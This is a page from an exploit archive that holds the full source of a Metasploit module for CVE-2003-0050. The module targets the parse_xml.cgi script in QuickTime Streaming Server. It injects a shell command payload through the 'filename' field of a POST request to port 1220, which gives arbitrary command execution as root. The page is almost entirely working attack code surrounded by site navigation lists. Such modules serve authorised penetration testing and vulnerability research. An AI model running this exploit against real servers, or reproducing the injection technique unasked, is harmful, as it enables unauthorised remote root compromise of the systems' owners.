QuickTime Streaming Server parse_xml.cgi Remote Execution

QuickTime Streaming Server parse_xml.cgi Remote Execution: Posted Dec 31, 2009; Authored by H D Moore | Site metasploit.com; The QuickTime Streaming Server contains a CGI script that is vulnerable to metacharacter injection, allow arbitrary commands to be executed as root.; tags | exploit, arbitrary, cgi, root; advisories | CVE-2003-0050; SHA-256 | 87169439514fb0afb74e3cd42e5f97a61ab10eb7cfb959af7b8efa2b61313896; Download | Favorite | View

QuickTime Streaming Server parse_xml.cgi Remote Execution

##
# $Id: qtss_parse_xml_exec.rb 7776 2009-12-09 15:13:35Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
      'Description'    => %q{
          The QuickTime Streaming Server contains a CGI script that is vulnerable
        to metacharacter injection, allow arbitrary commands to be executed as root.
        },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 7776 $',
      'References'     =>
        [
          [ 'OSVDB', '10562'],
          [ 'BID', '6954' ],
          [ 'CVE', '2003-0050' ]
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 512,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl bash telnet',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget' => 0
      ))

    register_options([
      Opt::RPORT(1220)
    ], self.class)
  end

  def exploit

    print_status("Sending post request with embedded command...")

    data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

    response = send_request_raw({
      'uri'    => "/parse_xml.cgi",
      'method'  => 'POST',
      'data'    => data,
      'headers' =>
      {
        'Content-Type'   => 'application/x-www-form-urlencoded',
        'Content-Length' => data.length,
      }
    }, 3)

    # If the upload worked, the server tries to redirect us to some info
    # about the file we just saved
    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end
end

Top Authors In Last 30 Days

Red Hat 250 files
Ubuntu 62 files
Debian 22 files
Apple 14 files
LiquidWorm 12 files
Gentoo 8 files
Google Security Research 4 files
Alter Prime 3 files
Jann Horn 3 files
Andrey Stoykov 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,169)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,011)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,372)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,008)
UNIX (9,481)
UnixWare (188)
Windows (6,785)
Other

QuickTime Streaming Server parse_xml.cgi Remote Execution

QuickTime Streaming Server parse_xml.cgi Remote Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

QuickTime Streaming Server parse_xml.cgi Remote Execution

Share This

QuickTime Streaming Server parse_xml.cgi Remote Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems